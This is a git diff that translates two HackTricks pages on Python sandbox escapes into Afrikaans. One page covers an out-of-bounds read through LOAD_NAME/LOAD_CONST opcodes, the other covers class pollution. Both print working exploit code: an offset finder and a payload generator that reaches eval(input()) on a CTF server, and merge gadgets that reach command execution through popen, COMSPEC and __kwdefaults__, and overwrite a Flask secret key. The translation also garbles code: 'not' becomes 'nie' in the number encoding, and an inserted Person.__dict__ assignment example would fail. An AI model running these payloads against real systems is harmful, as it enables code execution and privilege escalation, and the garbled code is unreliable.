generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md
View file

File diff suppressed because it is too large Load diff

264
generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.md
View file

@ -1,122 +1,111 @@
# LOAD\_NAME / LOAD\_CONST opcode OOB Read
# LOAD_NAME / LOAD_CONST opcode OOB Lees
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
**This info was taken** [**from this writeup**](https://blog.splitline.tw/hitcon-ctf-2022/)**.**
**Hierdie inligting is geneem** [**uit hierdie skryfstuk**](https://blog.splitline.tw/hitcon-ctf-2022/)**.**
### TL;DR <a href="#tldr-2" id="tldr-2"></a>
We can use OOB read feature in LOAD\_NAME / LOAD\_CONST opcode to get some symbol in the memory. Which means using trick like `(a, b, c, ... hundreds of symbol ..., __getattribute__) if [] else [].__getattribute__(...)` to get a symbol (such as function name) you want.
Ons kan die OOB-leesfunksie in die LOAD_NAME / LOAD_CONST opcode gebruik om 'n simbool in die geheue te kry. Dit beteken dat ons 'n truuk soos `(a, b, c, ... honderde simbole ..., __getattribute__) if [] else [].__getattribute__(...)` kan gebruik om 'n simbool (soos 'n funksienaam) te kry wat jy wil hê.
Then just craft your exploit.
Craft dan net jou uitbuit.
### Overview <a href="#overview-1" id="overview-1"></a>
The source code is pretty short, only contains 4 lines!
### Oorsig <a href="#overview-1" id="overview-1"></a>
Die bronkode is redelik kort, dit bevat slegs 4 lyne!
```python
source = input('>>> ')
if len(source) > 13337: exit(print(f"{'L':O<13337}NG"))
code = compile(source, '∅', 'eval').replace(co_consts=(), co_names=())
print(eval(code, {'__builtins__': {}}))1234
```
Jy kan arbitrêre Python-kode invoer en dit sal gekompileer word na 'n [Python-kode-objek](https://docs.python.org/3/c-api/code.html). Tog sal `co_consts` en `co_names` van daardie kode-objek vervang word met 'n leë tuple voordat die kode-objek geëvalueer word.
You can input arbitrary Python code, and it'll be compiled to a [Python code object](https://docs.python.org/3/c-api/code.html). However `co_consts` and `co_names` of that code object will be replaced with an empty tuple before eval that code object.
Op hierdie manier kan alle uitdrukkings wat konstantes (bv. getalle, strings ens.) of name (bv. veranderlikes, funksies) bevat, uiteindelik 'n segmenteringsfout veroorsaak.
So in this way, all the expression contains consts (e.g. numbers, strings etc.) or names (e.g. variables, functions) might cause segmentation fault in the end.
### Buitegrenslees <a href="#out-of-bound-read" id="out-of-bound-read"></a>
### Out of Bound Read <a href="#out-of-bound-read" id="out-of-bound-read"></a>
How does the segfault happen?
Let's start with a simple example, `[a, b, c]` could compile into the following bytecode.
Hoe gebeur die segmenteringsfout?
Laten ons begin met 'n eenvoudige voorbeeld, `[a, b, c]` kan gekompileer word na die volgende bytkode.
```
1 0 LOAD_NAME 0 (a)
2 LOAD_NAME 1 (b)
4 LOAD_NAME 2 (c)
6 BUILD_LIST 3
8 RETURN_VALUE12345
1 0 LOAD_NAME 0 (a)
2 LOAD_NAME 1 (b)
4 LOAD_NAME 2 (c)
6 BUILD_LIST 3
8 RETURN_VALUE12345
```
Maar wat as die `co_names` 'n leë tuple word? Die `LOAD_NAME 2` opcode word steeds uitgevoer en probeer waarde lees vanaf daardie geheue-adres waar dit oorspronklik moes wees. Ja, dit is 'n out-of-bound lees "kenmerk".
But what if the `co_names` become empty tuple? The `LOAD_NAME 2` opcode is still executed, and try to read value from that memory address it originally should be. Yes, this is an out-of-bound read "feature".
The core concept for the solution is simple. Some opcodes in CPython for example `LOAD_NAME` and `LOAD_CONST` are vulnerable (?) to OOB read.
They retrieve an object from index `oparg` from the `consts` or `names` tuple (that's what `co_consts` and `co_names` named under the hood). We can refer to the following short snippest about `LOAD_CONST` to see what CPython does when it proccesses to `LOAD_CONST` opcode.
Die kernkonsep vir die oplossing is eenvoudig. Sommige opcodes in CPython, soos `LOAD_NAME` en `LOAD_CONST`, is kwesbaar (?) vir OOB-lees.
Hulle haal 'n voorwerp uit die indeks `oparg` van die `consts` of `names` tuple (dit is wat `co_consts` en `co_names` onder die oppervlak genoem word). Ons kan na die volgende kort snipper oor `LOAD_CONST` verwys om te sien wat CPython doen wanneer dit die `LOAD_CONST` opcode verwerk.
```c
case TARGET(LOAD_CONST): {
PREDICTED(LOAD_CONST);
PyObject *value = GETITEM(consts, oparg);
Py_INCREF(value);
PUSH(value);
FAST_DISPATCH();
PREDICTED(LOAD_CONST);
PyObject *value = GETITEM(consts, oparg);
Py_INCREF(value);
PUSH(value);
FAST_DISPATCH();
}1234567
```
Op hierdie manier kan ons die OOB-funksie gebruik om 'n "naam" vanaf 'n arbitrêre geheueverskuiwing te kry. Om seker te maak watter naam dit het en watter verskuiwing dit het, bly net probeer `LOAD_NAME 0`, `LOAD_NAME 1` ... `LOAD_NAME 99` ... En jy kan iets vind in ongeveer oparg > 700. Jy kan ook probeer om gdb te gebruik om na die geheue-uitleg te kyk, maar ek dink nie dit sal makliker wees nie?
In this way we can use the OOB feature to get a "name" from arbitrary memory offset. To make sure what name it has and what's it's offset, just keep trying `LOAD_NAME 0`, `LOAD_NAME 1` ... `LOAD_NAME 99` ... And you could find something in about oparg > 700. You can also try to use gdb to take a look at the memory layout of course, but I don't think it would be more easier?
### Generating the Exploit <a href="#generating-the-exploit" id="generating-the-exploit"></a>
Once we retrieve those useful offsets for names / consts, how _do_ we get a name / const from that offset and use it? Here is a trick for you:\
Let's assume we can get a `__getattribute__` name from offset 5 (`LOAD_NAME 5`) with `co_names=()`, then just do the following stuff:
### Die Exploit Genereer <a href="#generating-the-exploit" id="generating-the-exploit"></a>
Sodra ons daardie nuttige verskuiwings vir name / konstantes herwin het, hoe _kry_ ons 'n naam / konstante vanaf daardie verskuiwing en gebruik dit? Hier is 'n truuk vir jou:\
Laat ons aanneem ons kan 'n `__getattribute__`-naam vanaf verskuiwing 5 (`LOAD_NAME 5`) met `co_names=()` kry, doen dan net die volgende stappe:
```python
[a,b,c,d,e,__getattribute__] if [] else [
[].__getattribute__
# you can get the __getattribute__ method of list object now!
[].__getattribute__
# you can get the __getattribute__ method of list object now!
]1234
```
> Merk op dat dit nie nodig is om dit as `__getattribute__` te noem nie, jy kan dit 'n korter of vreemder naam gee.
> Notice that it is not necessary to name it as `__getattribute__`, you can name it as something shorter or more weird
You can understand the reason behind by just viewing it's bytecode:
Jy kan die rede daarvoor verstaan deur net na sy bytecode te kyk:
```python
0 BUILD_LIST 0
2 POP_JUMP_IF_FALSE 20
>> 4 LOAD_NAME 0 (a)
>> 6 LOAD_NAME 1 (b)
>> 8 LOAD_NAME 2 (c)
>> 10 LOAD_NAME 3 (d)
>> 12 LOAD_NAME 4 (e)
>> 14 LOAD_NAME 5 (__getattribute__)
16 BUILD_LIST 6
18 RETURN_VALUE
20 BUILD_LIST 0
>> 22 LOAD_ATTR 5 (__getattribute__)
24 BUILD_LIST 1
26 RETURN_VALUE1234567891011121314
0 BUILD_LIST 0
2 POP_JUMP_IF_FALSE 20
>> 4 LOAD_NAME 0 (a)
>> 6 LOAD_NAME 1 (b)
>> 8 LOAD_NAME 2 (c)
>> 10 LOAD_NAME 3 (d)
>> 12 LOAD_NAME 4 (e)
>> 14 LOAD_NAME 5 (__getattribute__)
16 BUILD_LIST 6
18 RETURN_VALUE
20 BUILD_LIST 0
>> 22 LOAD_ATTR 5 (__getattribute__)
24 BUILD_LIST 1
26 RETURN_VALUE1234567891011121314
```
Let daarop dat `LOAD_ATTR` ook die naam uit `co_names` haal. Python laai name vanaf dieselfde offset as die naam dieselfde is, so die tweede `__getattribute__` word steeds vanaf offset=5 gelaai. Deur van hierdie kenmerk gebruik te maak, kan ons willekeurige name gebruik as die naam in die nabygeleë geheue is.
Notice that `LOAD_ATTR` also retrieve the name from `co_names`. Python loads names from the same offset if the name is the same, so the second `__getattribute__` is still loaded from offset=5. Using this feature we can use arbitrary name once the name is in the memory nearby.
Dit behoort maklik te wees om getalle te genereer:
For generating numbers should be trivial:
* 0: not \[\[]]
* 1: not \[]
* 2: (not \[]) + (not \[])
* 0: nie \[\[]]
* 1: nie \[]
* 2: (nie \[]) + (nie \[])
* ...
### Exploit Script <a href="#exploit-script-1" id="exploit-script-1"></a>
### Uitbuitingskrip <a href="#exploit-script-1" id="exploit-script-1"></a>
I didn't use consts due to the length limit.
First here is a script for us to find those offsets of names.
Ek het nie konstantes gebruik as gevolg van die lengtebeperking nie.
Eerstens is hier 'n krip vir ons om daardie offsette van name te vind.
```python
from types import CodeType
from opcode import opmap
@ -124,56 +113,54 @@ from sys import argv
class MockBuiltins(dict):
def __getitem__(self, k):
if type(k) == str:
return k
def __getitem__(self, k):
if type(k) == str:
return k
if __name__ == '__main__':
n = int(argv[1])
n = int(argv[1])
code = [
*([opmap['EXTENDED_ARG'], n // 256]
if n // 256 != 0 else []),
opmap['LOAD_NAME'], n % 256,
opmap['RETURN_VALUE'], 0
]
code = [
*([opmap['EXTENDED_ARG'], n // 256]
if n // 256 != 0 else []),
opmap['LOAD_NAME'], n % 256,
opmap['RETURN_VALUE'], 0
]
c = CodeType(
0, 0, 0, 0, 0, 0,
bytes(code),
(), (), (), '<sandbox>', '<eval>', 0, b'', ()
)
c = CodeType(
0, 0, 0, 0, 0, 0,
bytes(code),
(), (), (), '<sandbox>', '<eval>', 0, b'', ()
)
ret = eval(c, {'__builtins__': MockBuiltins()})
if ret:
print(f'{n}: {ret}')
ret = eval(c, {'__builtins__': MockBuiltins()})
if ret:
print(f'{n}: {ret}')
# for i in $(seq 0 10000); do python find.py $i ; done1234567891011121314151617181920212223242526272829303132
```
And the following is for generating the real Python exploit.
En die volgende is vir die genereer van die werklike Python uitbuiting.
```python
import sys
import unicodedata
class Generator:
# get numner
def __call__(self, num):
if num == 0:
return '(not[[]])'
return '(' + ('(not[])+' * num)[:-1] + ')'
# get numner
def __call__(self, num):
if num == 0:
return '(not[[]])'
return '(' + ('(not[])+' * num)[:-1] + ')'
# get string
def __getattribute__(self, name):
try:
offset = None.__dir__().index(name)
return f'keys[{self(offset)}]'
except ValueError:
offset = None.__class__.__dir__(None.__class__).index(name)
return f'keys2[{self(offset)}]'
# get string
def __getattribute__(self, name):
try:
offset = None.__dir__().index(name)
return f'keys[{self(offset)}]'
except ValueError:
offset = None.__class__.__dir__(None.__class__).index(name)
return f'keys2[{self(offset)}]'
_ = Generator()
@ -181,29 +168,29 @@ _ = Generator()
names = []
chr_code = 0
for x in range(4700):
while True:
chr_code += 1
char = unicodedata.normalize('NFKC', chr(chr_code))
if char.isidentifier() and char not in names:
names.append(char)
break
while True:
chr_code += 1
char = unicodedata.normalize('NFKC', chr(chr_code))
if char.isidentifier() and char not in names:
names.append(char)
break
offsets = {
"__delitem__": 2800,
"__getattribute__": 2850,
'__dir__': 4693,
'__repr__': 2128,
"__delitem__": 2800,
"__getattribute__": 2850,
'__dir__': 4693,
'__repr__': 2128,
}
variables = ('keys', 'keys2', 'None_', 'NoneType',
'm_repr', 'globals', 'builtins',)
'm_repr', 'globals', 'builtins',)
for name, offset in offsets.items():
names[offset] = name
names[offset] = name
for i, var in enumerate(variables):
assert var not in offsets
names[792 + i] = var
assert var not in offsets
names[792 + i] = var
source = f'''[
@ -214,13 +201,13 @@ NoneType := None_.__getattribute__({_.__class__}),
keys2 := NoneType.__dir__(NoneType),
get := NoneType.__getattribute__,
m_repr := get(
get(get([],{_.__class__}),{_.__base__}),
{_.__subclasses__}
get(get([],{_.__class__}),{_.__base__}),
{_.__subclasses__}
)()[-{_(2)}].__repr__,
globals := get(m_repr, m_repr.__dir__()[{_(6)}]),
builtins := globals[[*globals][{_(7)}]],
builtins[[*builtins][{_(19)}]](
builtins[[*builtins][{_(28)}]](), builtins
builtins[[*builtins][{_(28)}]](), builtins
)
]'''.strip().replace('\n', '').replace(' ', '')
@ -230,32 +217,29 @@ print(source)
# (python exp.py; echo '__import__("os").system("sh")'; cat -) | nc challenge.server port
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273
```
It basically does the following things, for those strings we get it from the `__dir__` method:
Dit doen basies die volgende dinge, vir daardie strings wat ons kry van die `__dir__` metode:
```python
getattr = (None).__getattribute__('__class__').__getattribute__
builtins = getattr(
getattr(
getattr(
[].__getattribute__('__class__'),
'__base__'),
'__subclasses__'
)()[-2],
getattr(
getattr(
[].__getattribute__('__class__'),
'__base__'),
'__subclasses__'
)()[-2],
'__repr__').__getattribute__('__globals__')['builtins']
builtins['eval'](builtins['input']())
```
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>

272
generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md
View file

@ -1,23 +1,22 @@
# Class Pollution (Python's Prototype Pollution)
# Klasverontreiniging (Python se Prototipeverontreiniging)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
</details>
## Basic Example
Check how is possible to pollute classes of objects with strings:
## Basiese Voorbeeld
Kyk hoe dit moontlik is om klasse van voorwerpe met strings te verontreinig:
```python
class Company: pass
class Developer(Company): pass
@ -41,9 +40,49 @@ e.__class__.__base__.__base__.__qualname__ = 'Polluted_Company'
print(d) #<__main__.Polluted_Developer object at 0x1041d2b80>
print(c) #<__main__.Polluted_Company object at 0x1043a72b0>
```
## Basiese Kwesbaarheidsvoorbeeld
## Basic Vulnerability Example
Consider the following Python code:
Beskou die volgende Python-kode:
```python
class Person:
def __init__(self, name, age):
self.name = name
self.age = age
person = Person("Alice", 25)
print(person.name)
```
This code defines a `Person` class with a constructor that takes in a `name` and an `age`. It then creates an instance of the `Person` class with the name "Alice" and age 25, and prints out the name of the person.
Hierdie kode definieer 'n `Person`-klas met 'n konstrukteur wat 'n `name` en 'n `age` aanvaar. Dit skep dan 'n instansie van die `Person`-klas met die naam "Alice" en ouderdom 25, en druk die naam van die persoon uit.
Now, let's say an attacker is able to modify the `Person` class prototype and add a new method called `get_password`:
Nou, stel ons sê 'n aanvaller kan die `Person`-klas se prototipe wysig en 'n nuwe metode genaamd `get_password` byvoeg:
```python
Person.__dict__["get_password"] = lambda self: "password123"
```
The attacker can then call the `get_password` method on the `person` instance:
Die aanvaller kan dan die `get_password`-metode op die `person`-instansie aanroep:
```python
print(person.get_password())
```
This will print out the string "password123", even though the `get_password` method was never defined in the original `Person` class.
Dit sal die string "password123" uitdruk, selfs al is die `get_password`-metode nooit in die oorspronklike `Person`-klas gedefinieer nie.
This is an example of class pollution or prototype pollution vulnerability. By modifying the class prototype, the attacker is able to add or modify methods and properties of the class at runtime, potentially leading to unauthorized access or manipulation of data.
Dit is 'n voorbeeld van 'n klasverontreiniging of prototipeverontreiniging-kwesbaarheid. Deur die klasprototipe te wysig, kan die aanvaller metodes en eienskappe van die klas byvoeg of wysig tydens uitvoering, wat moontlik kan lei tot ongemagtigde toegang of manipulasie van data.
```python
# Initial state
class Employee: pass
@ -52,37 +91,35 @@ print(vars(emp)) #{}
# Vulenrable function
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
USER_INPUT = {
"name":"Ahemd",
"age": 23,
"manager":{
"name":"Sarah"
}
"name":"Ahemd",
"age": 23,
"manager":{
"name":"Sarah"
}
}
merge(USER_INPUT, emp)
print(vars(emp)) #{'name': 'Ahemd', 'age': 23, 'manager': {'name': 'Sarah'}}
```
## Gadget Examples
## Voorbeelde van Gadget
<details>
<summary>Creating class property default value to RCE (subprocess)</summary>
<summary>Skep klas eienskap se verstekwaarde na RCE (subproses)</summary>
```python
from os import popen
class Employee: pass # Creating an empty class
@ -90,31 +127,31 @@ class HR(Employee): pass # Class inherits from Employee class
class Recruiter(HR): pass # Class inherits from HR class
class SystemAdmin(Employee): # Class inherits from Employee class
def execute_command(self):
command = self.custom_command if hasattr(self, 'custom_command') else 'echo Hello there'
return f'[!] Executing: "{command}", output: "{popen(command).read().strip()}"'
def execute_command(self):
command = self.custom_command if hasattr(self, 'custom_command') else 'echo Hello there'
return f'[!] Executing: "{command}", output: "{popen(command).read().strip()}"'
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
USER_INPUT = {
"__class__":{
"__base__":{
"__base__":{
"custom_command": "whoami"
}
}
}
"__class__":{
"__base__":{
"__base__":{
"custom_command": "whoami"
}
}
}
}
recruiter_emp = Recruiter()
@ -129,30 +166,28 @@ merge(USER_INPUT, recruiter_emp)
print(system_admin_emp.execute_command())
#> [!] Executing: "whoami", output: "abdulrah33m"
```
</details>
<details>
<summary>Polluting other classes and global vars through <code>globals</code></summary>
<summary>Vervuiling van ander klasse en globale vars deur middel van <code>globals</code></summary>
```python
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
class User:
def __init__(self):
pass
def __init__(self):
pass
class NotAccessibleClass: pass
@ -163,32 +198,30 @@ merge({'__class__':{'__init__':{'__globals__':{'not_accessible_variable':'Pollut
print(not_accessible_variable) #> Polluted variable
print(NotAccessibleClass) #> <class '__main__.PollutedClass'>
```
</details>
<details>
<summary>Arbitrary subprocess execution</summary>
<summary>Willekeurige onderprocesuitvoering</summary>
```python
import subprocess, json
class Employee:
def __init__(self):
pass
def __init__(self):
pass
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
# Overwrite env var "COMSPEC" to execute a calc
USER_INPUT = json.loads('{"__init__":{"__globals__":{"subprocess":{"os":{"environ":{"COMSPEC":"cmd /c calc"}}}}}}') # attacker-controlled value
@ -197,39 +230,37 @@ merge(USER_INPUT, Employee())
subprocess.Popen('whoami', shell=True) # Calc.exe will pop up
```
</details>
<details>
<summary>Overwritting <strong><code>__kwdefaults__</code></strong></summary>
**`__kwdefaults__`** is a special attribute of all functions, based on Python [documentation](https://docs.python.org/3/library/inspect.html), it is a “mapping of any default values for **keyword-only** parameters”. Polluting this attribute allows us to control the default values of keyword-only parameters of a function, these are the functions parameters that come after \* or \*args.
<summary>Oorskrywing van <strong><code>__kwdefaults__</code></strong></summary>
**`__kwdefaults__`** is 'n spesiale eienskap van alle funksies, gebaseer op Python [dokumentasie](https://docs.python.org/3/library/inspect.html), dit is 'n "afbeelding van enige verstekwaardes vir **slegs-sleutelwoord** parameters". Deur hierdie eienskap te besoedel, kan ons die verstekwaardes van slegs-sleutelwoord parameters van 'n funksie beheer, dit is die funksie se parameters wat na \* of \*args kom.
```python
from os import system
import json
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
class Employee:
def __init__(self):
pass
def __init__(self):
pass
def execute(*, command='whoami'):
print(f'Executing {command}')
system(command)
print(f'Executing {command}')
system(command)
print(execute.__kwdefaults__) #> {'command': 'whoami'}
execute() #> Executing whoami
@ -242,24 +273,21 @@ print(execute.__kwdefaults__) #> {'command': 'echo Polluted'}
execute() #> Executing echo Polluted
#> Polluted
```
</details>
<details>
<summary>Overwriting Flask secret across files</summary>
So, if you can do a class pollution over an object defined in the main python file of the web but **whose class is defined in a different file** than the main one. Because in order to access \_\_globals\_\_ in the previous payloads you need to access the class of the object or methods of the class, you will be able to **access the globals in that file, but not in the main one**. \
Therefore, you **won't be able to access the Flask app global object** that defined the **secret key** in the main page:
<summary>Oorskryf Flask-geheim regoor lêers</summary>
So, as jy 'n klasvervuiling kan doen oor 'n voorwerp wat in die hoof Python-lêer van die web gedefinieer is, **maar waarvan die klas in 'n ander lêer gedefinieer is** as die hoof een. Omdat jy in die vorige payloads toegang tot \_\_globals\_\_ moet hê, moet jy toegang tot die klas van die voorwerp of metodes van die klas hê, sal jy in staat wees om **die globals in daardie lêer te benader, maar nie in die hoof een nie**. \
Daarom sal jy **nie toegang hê tot die Flask-app globale voorwerp** wat die **geheime sleutel** in die hoofbladsy gedefinieer het nie:
```python
app = Flask(__name__, template_folder='templates')
app.secret_key = '(:secret:)'
```
In hierdie scenario het jy 'n toestel nodig om deur lêers te beweeg om by die hooflêer te kom om toegang te verkry tot die globale objek `app.secret_key` om die Flask-geheime sleutel te verander en sodoende [voorregte te verhoog deur hierdie sleutel te ken](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign).
In this scenario you need a gadget to traverse files to get to the main one to **access the global object `app.secret_key`** to change the Flask secret key and be able to [**escalate privileges** knowing this key](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign).
A payload like this one [from this writeup](https://ctftime.org/writeup/36082):
'n Nutslading soos hierdie een [uit hierdie skryfstuk](https://ctftime.org/writeup/36082):
{% code overflow="wrap" %}
```python
@ -267,30 +295,30 @@ __init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.se
```
{% endcode %}
Use this payload to **change `app.secret_key`** (the name in your app might be different) to be able to sign new and more privileges flask cookies.
Gebruik hierdie payload om **`app.secret_key`** (die naam in jou app mag verskil) te verander sodat jy nuwe en meer bevoorregte flask koekies kan teken.
</details>
Check also the following page for more read only gadgets:
Kyk ook na die volgende bladsy vir meer slegs-lees gadgets:
{% content-ref url="python-internal-read-gadgets.md" %}
[python-internal-read-gadgets.md](python-internal-read-gadgets.md)
{% endcontent-ref %}
## References
## Verwysings
* [https://blog.abdulrah33m.com/prototype-pollution-in-python/](https://blog.abdulrah33m.com/prototype-pollution-in-python/)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
